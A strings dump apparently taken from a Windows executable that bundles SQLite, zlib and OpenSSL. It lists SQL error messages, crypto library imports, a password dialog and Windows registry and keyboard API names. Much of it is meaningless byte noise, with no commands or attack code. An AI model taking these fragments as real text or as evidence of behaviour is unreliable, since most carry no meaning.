sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_function
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_NULL
PRIMARY KEY must be unique
:.uij
sqlite3
sqlite_version
SQLiteNativeException
It.Iud
shell.application
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%<!"%$%&%(%*% %-%/%1%3%5%7%9%;$=%?%A%D%F%H%J%K%L%M%N%O%R%U%X%[%^%_%`%a%b%d%f%h%i%j%k%l%m%o%s% !,!
P%S%V%Y%\%
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
 8$4,8$4
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
SQLITE_
d-d-d d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
SQLite format 3
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
Invalid key value
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
rekey
hexkey
hexrekey
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
docid INTEGER PRIMARY KEY
%z, 'c%d%q'
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
PRAGMA %Q.page_size
,%s(x.'c%d%q')
FROM '%q'.'%q%s' AS x
,%s(?)
unrecognized parameter: %s
unrecognized matchinfo: %s
unrecognized order: %s
error parsing prefix parameter: %s
missing %s parameter in fts4 constructor
SELECT %s WHERE rowid = ?
malformed MATCH expression: [%s]
SELECT %s ORDER BY rowid %s
illegal first argument to %s
porter
unknown tokenizer: %s
SELECT %s WHERE rowid=?
INSERT INTO %Q.'%q_content' VALUES(%s)
%s_segments
SELECT %s
unrecognized matchinfo request: %c
%d %d %d %d
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE x(%s
%s, %s
%s {%s}
?456789:;<=
!"#$%&'()* ,-./0123
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
33333333333333
337373?3
333373?33
33333337
3733333
3337333
3333373
3737333
373333?3
3333333333
333333333
333?33?333
333373?3
Y.vR3
@-M}(
.Ni{R|L
)Zw%C
Iu.nc
(C.lg
.rsrc
[email protected]>
.Go?N
=>%>=?.'
t..Cb
g.PUGv:
Q!(AN.xl
(j(%d
.OP0|
>SL%d
.lIyyd
LQU %s
GE.Th
[email protected]
%S0T_
Qf,%fo
R.ug'
)%Uv[.`
4.VX9o
*ZZ.XE<
mE.THj
DkIz%cQSRbPi
20 %Sj
v#%S@
{l^$.dt
r%Crt
I(0!Mß
Ys%X6
I:\D$
[email protected]
.iT\t
7.cDL;5%
\.HHH
c-wUu(%p,X):
evpkey
.pjducix
1.0.26
##%%&&))**
&'()* ,-./
.pp@0
%'%1$=%C%K%O%
.%.-.3.7.9.?.W.[.o.y.
0#0)070;
3Ó/353A3G3[3_3g3k3s3
9#9%9)9/
C%C'C3C7C9COCWCiC
IN_KEYG'ALGOR
~-Key:
.pkmgH
.VnbC
4092833
L{.nN
/faq.Dml
yDg.aJ
$'931311
|e"BWeb
Q/%2sBROp
FT43_'.Kg
62%8sR
E>O%s
.dBD,^
5nT}
[[%s]]
!f.omj
HTTP/O0
s<.na
n/MSG
3620483072/409
6144819
C:\E\T
l}C.we
zcÁ
9#_%- #,
EY}.Gr
Ja.ch^\
]<%cQ\
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
USER32.dll
WS2_32.dll
ReportEventA
LIBEAY32.dll
AES_set_decrypt_key
AES_set_encrypt_key
AES_unwrap_key
AES_wrap_key
ASN1_PCTX_get_cert_flags
ASN1_PCTX_set_cert_flags
AUTHORITY_KEYID_free
AUTHORITY_KEYID_it
AUTHORITY_KEYID_new
BF_set_key
BIO_get_port
BIO_set_tcp_ndelay
CAST_set_key
CERTIFICATEPOLICIES_free
CERTIFICATEPOLICIES_it
CERTIFICATEPOLICIES_new
CMS_EncryptedData_set1_key
CMS_RecipientEncryptedKey_cert_cmp
CMS_RecipientEncryptedKey_get0_id
CMS_RecipientInfo_get0_pkey_ctx
CMS_RecipientInfo_kari_set0_pkey
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_pkey
CMS_SignerInfo_cert_cmp
CMS_SignerInfo_get0_pkey_ctx
CMS_SignerInfo_set1_signer_cert
CMS_add0_CertificateChoices
CMS_add0_cert
CMS_add0_recipient_key
CMS_add0_recipient_password
CMS_add1_cert
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_password
CMS_decrypt_set1_pkey
CMS_get1_certs
CMS_set1_signers_certs
Camellia_set_key
DES_check_key_parity
DES_is_weak_key
DES_key_sched
DES_random_key
DES_read_2passwords
DES_read_password
DES_set_key_checked
DES_set_key_unchecked
DES_string_to_2keys
DES_string_to_key
DH_check_pub_key
DH_compute_key
DH_compute_key_padded
DH_generate_key
DSA_generate_key
ECDH_compute_key
EC_KEY_check_key
EC_KEY_clear_flags
EC_KEY_copy
EC_KEY_dup
EC_KEY_free
EC_KEY_generate_key
EC_KEY_get0_group
EC_KEY_get0_private_key
EC_KEY_get0_public_key
EC_KEY_get_conv_form
EC_KEY_get_enc_flags
EC_KEY_get_flags
EC_KEY_get_key_method_data
EC_KEY_insert_key_method_data
EC_KEY_new
EC_KEY_new_by_curve_name
EC_KEY_precompute_mult
EC_KEY_print
EC_KEY_print_fp
EC_KEY_set_asn1_flag
EC_KEY_set_conv_form
EC_KEY_set_enc_flags
EC_KEY_set_flags
EC_KEY_set_group
EC_KEY_set_private_key
EC_KEY_set_public_key
EC_KEY_set_public_key_affine_coordinates
EC_KEY_up_ref
ENGINE_cmd_is_executable
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd_string
ENGINE_get_cmd_defns
ENGINE_get_load_privkey_function
ENGINE_get_load_pubkey_function
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_asn1_meth_engine
ENGINE_get_pkey_asn1_meth_str
ENGINE_get_pkey_asn1_meths
ENGINE_get_pkey_meth
ENGINE_get_pkey_meth_engine
ENGINE_get_pkey_meths
ENGINE_get_ssl_client_cert_function
ENGINE_load_private_key
ENGINE_load_public_key
ENGINE_load_ssl_client_cert
ENGINE_pkey_asn1_find_str
ENGINE_register_all_pkey_asn1_meths
ENGINE_register_all_pkey_meths
ENGINE_register_pkey_asn1_meths
ENGINE_register_pkey_meths
ENGINE_set_cmd_defns
ENGINE_set_default_pkey_asn1_meths
ENGINE_set_default_pkey_meths
ENGINE_set_load_privkey_function
ENGINE_set_load_pubkey_function
ENGINE_set_load_ssl_client_cert_function
ENGINE_set_pkey_asn1_meths
ENGINE_set_pkey_meths
ENGINE_unregister_pkey_asn1_meths
ENGINE_unregister_pkey_meths
ESS_CERT_ID_dup
ESS_CERT_ID_free
ESS_CERT_ID_new
ESS_SIGNING_CERT_dup
ESS_SIGNING_CERT_free
ESS_SIGNING_CERT_new
EVP_BytesToKey
EVP_MD_pkey_type
EVP_PKCS82PKEY
EVP_PKEY2PKCS8
EVP_PKEY2PKCS8_broken
EVP_PKEY_add1_attr
EVP_PKEY_add1_attr_by_NID
EVP_PKEY_add1_attr_by_OBJ
EVP_PKEY_add1_attr_by_txt
EVP_PKEY_asn1_set_item
EVP_PKEY_delete_attr
EVP_PKEY_get_attr
EVP_PKEY_get_attr_by_NID
EVP_PKEY_get_attr_by_OBJ
EVP_PKEY_get_attr_count
EXTENDED_KEY_USAGE_free
EXTENDED_KEY_USAGE_it
EXTENDED_KEY_USAGE_new
KRB5_ENCKEY_free
KRB5_ENCKEY_it
KRB5_ENCKEY_new
NETSCAPE_CERT_SEQUENCE_free
NETSCAPE_CERT_SEQUENCE_it
NETSCAPE_CERT_SEQUENCE_new
NETSCAPE_SPKI_get_pubkey
NETSCAPE_SPKI_set_pubkey
OCSP_CERTID_dup
OCSP_CERTID_free
OCSP_CERTID_it
OCSP_CERTID_new
OCSP_CERTSTATUS_free
OCSP_CERTSTATUS_it
OCSP_CERTSTATUS_new
OCSP_REQ_CTX_http
OCSP_basic_add1_cert
OCSP_cert_id_new
OCSP_cert_status_str
OCSP_cert_to_id
OCSP_parse_url
OCSP_request_add1_cert
OCSP_url_svcloc_new
PEM_read_DSAPrivateKey
PEM_read_DSA_PUBKEY
PEM_read_ECPrivateKey
PEM_read_EC_PUBKEY
PEM_read_NETSCAPE_CERT_SEQUENCE
PEM_read_PKCS8_PRIV_KEY_INFO
PEM_read_PUBKEY
PEM_read_PrivateKey
PEM_read_RSAPrivateKey
PEM_read_RSAPublicKey
PEM_read_RSA_PUBKEY
PEM_read_X509_CERT_PAIR
PEM_read_bio_DSA_PUBKEY
PEM_read_bio_ECPrivateKey
PEM_read_bio_EC_PUBKEY
PEM_read_bio_PKCS8_PRIV_KEY_INFO
PEM_read_bio_PUBKEY
PEM_read_bio_RSA_PUBKEY
PEM_read_bio_X509_CERT_PAIR
PEM_write_DSAPrivateKey
PEM_write_DSA_PUBKEY
PEM_write_ECPrivateKey
PEM_write_EC_PUBKEY
PEM_write_NETSCAPE_CERT_SEQUENCE
PEM_write_PKCS8PrivateKey
PEM_write_PKCS8PrivateKey_nid
PEM_write_PKCS8_PRIV_KEY_INFO
PEM_write_PUBKEY
PEM_write_PrivateKey
PEM_write_RSAPrivateKey
PEM_write_RSAPublicKey
PEM_write_RSA_PUBKEY
PEM_write_X509_CERT_PAIR
PEM_write_bio_DSA_PUBKEY
PEM_write_bio_ECPrivateKey
PEM_write_bio_EC_PUBKEY
PEM_write_bio_PKCS8PrivateKey_nid
PEM_write_bio_PKCS8_PRIV_KEY_INFO
PEM_write_bio_PUBKEY
PEM_write_bio_RSA_PUBKEY
PEM_write_bio_X509_CERT_PAIR
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_PBE_keyivgen
PKCS12_add_cert
PKCS12_add_key
PKCS12_add_localkeyid
PKCS12_certbag2x509
PKCS12_certbag2x509crl
PKCS12_decrypt_skey
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_newpass
PKCS12_x5092certbag
PKCS12_x509crl2certbag
PKCS7_add_certificate
PKCS7_cert_from_signer_info
PKCS8_PRIV_KEY_INFO_free
PKCS8_PRIV_KEY_INFO_it
PKCS8_PRIV_KEY_INFO_new
PKCS8_add_keyusage
PKCS8_pkey_get0
PKCS8_pkey_set0
PKEY_USAGE_PERIOD_free
PKEY_USAGE_PERIOD_it
PKEY_USAGE_PERIOD_new
PROXY_CERT_INFO_EXTENSION_free
PROXY_CERT_INFO_EXTENSION_it
PROXY_CERT_INFO_EXTENSION_new
RC2_set_key
RC4_set_key
RSAPrivateKey_dup
RSAPrivateKey_it
RSAPublicKey_dup
RSAPublicKey_it
SEED_set_key
SRP_Calc_client_key
SRP_Calc_server_key
TS_CONF_load_cert
TS_CONF_load_certs
TS_CONF_load_key
TS_CONF_set_certs
TS_CONF_set_ess_cert_id_chain
TS_CONF_set_signer_cert
TS_CONF_set_signer_key
TS_MSG_IMPRINT_dup
TS_MSG_IMPRINT_free
TS_MSG_IMPRINT_get_algo
TS_MSG_IMPRINT_get_msg
TS_MSG_IMPRINT_new
TS_MSG_IMPRINT_print_bio
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_msg
TS_REQ_get_cert_req
TS_REQ_get_msg_imprint
TS_REQ_set_cert_req
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_key
TS_TST_INFO_get_msg_imprint
TS_TST_INFO_set_msg_imprint
X509_CERT_AUX_free
X509_CERT_AUX_it
X509_CERT_AUX_new
X509_CERT_AUX_print
X509_CERT_PAIR_free
X509_CERT_PAIR_it
X509_CERT_PAIR_new
X509_CRL_get0_by_cert
X509_CRL_http_nbio
X509_PKEY_free
X509_PKEY_new
X509_PUBKEY_free
X509_PUBKEY_get0_param
X509_PUBKEY_it
X509_PUBKEY_new
X509_PUBKEY_set
X509_PUBKEY_set0_param
X509_REQ_check_private_key
X509_REQ_get_pubkey
X509_STORE_CTX_set_cert
X509_STORE_get1_certs
X509_certificate_type
X509_check_private_key
X509_get0_pubkey_bitstr
X509_get_default_cert_area
X509_get_default_cert_dir
X509_get_default_cert_dir_env
X509_get_pubkey
X509_get_pubkey_parameters
X509_http_nbio
X509_keyid_get0
X509_keyid_set1
X509_load_cert_crl_file
X509_load_cert_file
X509_pubkey_digest
X509_supported_extension
X509_verify_cert
X509_verify_cert_error_string
_ossl_old_des_is_weak_key
_ossl_old_des_key_sched
_ossl_old_des_random_key
_ossl_old_des_read_2passwords
_ossl_old_des_read_password
_ossl_old_des_string_to_2keys
_ossl_old_des_string_to_key
_shadow_DES_check_key
b2i_PrivateKey
b2i_PrivateKey_bio
b2i_PublicKey
b2i_PublicKey_bio
d2i_AUTHORITY_KEYID
d2i_CERTIFICATEPOLICIES
d2i_DSAPrivateKey_bio
d2i_DSAPrivateKey_fp
d2i_DSAPublicKey
d2i_DSA_PUBKEY
d2i_DSA_PUBKEY_bio
d2i_DSA_PUBKEY_fp
d2i_ECPrivateKey
d2i_ECPrivateKey_bio
d2i_ECPrivateKey_fp
d2i_EC_PUBKEY
d2i_EC_PUBKEY_bio
d2i_EC_PUBKEY_fp
d2i_ESS_CERT_ID
d2i_ESS_SIGNING_CERT
d2i_EXTENDED_KEY_USAGE
d2i_KRB5_ENCKEY
d2i_NETSCAPE_CERT_SEQUENCE
d2i_OCSP_CERTID
d2i_OCSP_CERTSTATUS
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
d2i_PKCS8_PRIV_KEY_INFO
d2i_PKCS8_PRIV_KEY_INFO_bio
d2i_PKCS8_PRIV_KEY_INFO_fp
d2i_PKEY_USAGE_PERIOD
d2i_PROXY_CERT_INFO_EXTENSION
d2i_PUBKEY
d2i_PUBKEY_bio
d2i_PUBKEY_fp
d2i_PrivateKey_fp
d2i_RSAPrivateKey_bio
d2i_RSAPrivateKey_fp
d2i_RSAPublicKey_bio
d2i_RSAPublicKey_fp
d2i_RSA_PUBKEY
d2i_RSA_PUBKEY_bio
d2i_RSA_PUBKEY_fp
d2i_TS_MSG_IMPRINT
d2i_TS_MSG_IMPRINT_bio
d2i_TS_MSG_IMPRINT_fp
d2i_X509_CERT_AUX
d2i_X509_CERT_PAIR
d2i_X509_PKEY
d2i_X509_PUBKEY
i2b_PrivateKey_bio
i2b_PublicKey_bio
i2d_AUTHORITY_KEYID
i2d_CERTIFICATEPOLICIES
i2d_DSAPrivateKey_bio
i2d_DSAPrivateKey_fp
i2d_DSAPublicKey
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY_bio
i2d_DSA_PUBKEY_fp
i2d_ECPrivateKey
i2d_ECPrivateKey_bio
i2d_ECPrivateKey_fp
i2d_EC_PUBKEY
i2d_EC_PUBKEY_bio
i2d_EC_PUBKEY_fp
i2d_ESS_CERT_ID
i2d_ESS_SIGNING_CERT
i2d_EXTENDED_KEY_USAGE
i2d_KRB5_ENCKEY
i2d_OCSP_CERTID
i2d_OCSP_CERTSTATUS
i2d_PKCS8PrivateKeyInfo_bio
i2d_PKCS8PrivateKeyInfo_fp
i2d_PKCS8PrivateKey_bio
i2d_PKCS8PrivateKey_fp
i2d_PKCS8PrivateKey_nid_bio
i2d_PKCS8PrivateKey_nid_fp
i2d_PKCS8_PRIV_KEY_INFO
i2d_PKCS8_PRIV_KEY_INFO_bio
i2d_PKCS8_PRIV_KEY_INFO_fp
i2d_PKEY_USAGE_PERIOD
i2d_PROXY_CERT_INFO_EXTENSION
i2d_PUBKEY
i2d_PUBKEY_bio
i2d_PUBKEY_fp
i2d_PrivateKey_fp
i2d_RSAPrivateKey_bio
i2d_RSAPrivateKey_fp
i2d_RSAPublicKey_bio
i2d_RSAPublicKey_fp
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY_bio
i2d_RSA_PUBKEY_fp
i2d_TS_MSG_IMPRINT
i2d_TS_MSG_IMPRINT_bio
i2d_TS_MSG_IMPRINT_fp
i2d_X509_CERT_AUX
i2d_X509_CERT_PAIR
i2d_X509_PKEY
i2d_X509_PUBKEY
i2o_ECPublicKey
idea_set_decrypt_key
idea_set_encrypt_key
o2i_ECPublicKey
private_AES_set_decrypt_key
private_AES_set_encrypt_key
private_RC4_set_key
w".pB
%CyYA0hD
R.ARu
.Slv&
4WURl."
SK-Ww}
R.Vd0
7'#.Smbi
P%s_t.
PX.DR*
vZ %D
.FA;r
.sPI0h
\.tP,
cPhhTtp\p
\.HLPT.
\.lptx.
<|%x-t
X.Cr&
M^.WLA
pen" 1.0.2e 3 Dec 201N
master_key
is %d?)`
'o'%s:%d: re
ng)msg_hdr->
%ld (%s\f
RgKey-Arg
c&cmd=U
|PKEY
SSLEAY32.dll
SSL_CONF_cmd
SSL_CONF_cmd_argv
SSL_CONF_cmd_value_type
SSL_CTX_get0_certificate
SSL_CTX_get0_privatekey
SSL_CTX_get_cert_store
SSL_CTX_get_client_cert_cb
SSL_CTX_set_cert_cb
SSL_CTX_set_cert_store
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_engine
SSL_CTX_set_msg_callback
SSL_CTX_set_srp_password
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate_ASN1
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_certs_clear
SSL_check_private_key
SSL_export_keying_material
SSL_extension_supported
SSL_get_certificate
SSL_get_peer_cert_chain
SSL_get_privatekey
SSL_set_cert_cb
SSL_set_msg_callback
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
LoginDialog
Database Login
&Password:
PasswordChar
PasswordDialog
Enter password
GetWindowsDirectoryA
GetCPInfo
RegQueryInfoKeyA
RegOpenKeyExW
RegOpenKeyExA
RegLoadKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetKeyboardType
.idata
.rdata
P.reloc
P.rsrc
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
